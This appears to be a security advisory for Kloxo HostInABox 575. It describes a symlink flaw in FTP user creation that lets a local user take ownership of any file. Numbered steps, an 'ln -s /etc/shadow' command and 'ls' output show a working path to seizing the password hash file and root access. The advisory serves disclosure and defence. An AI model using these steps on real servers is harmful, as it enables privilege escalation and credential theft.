Kloxo HostInABox 575 - local users can take control of any file or directory



DESCRIPTION


Local users can take ownership of any file via a symlink attack when adding FTP users.



IMPACT


Local users could obtain root privileges.


1. Log into Kloxo
2. Click "Ftp Users"
3. Click "Add Ftp User"
4. In the "Ftp User Name" box, type: example
5. In the "Password" and "Confirm Password" boxes, type whatever you'd like
6. In the "Virtual Directory" box, type: example
7. Before adding the FTP user, create a symlink for /home/username/example to /etc/shadow:


[user1@testing574 user1]$ ln -s /etc/shadow example


8. Click "Add"

Observe that the user now owns /etc/shadow:

[user1@testing574 user1]$ ls -l /etc/shadow
-r-------- 1 user1 root 1415 May 19 17:05 /etc/shadow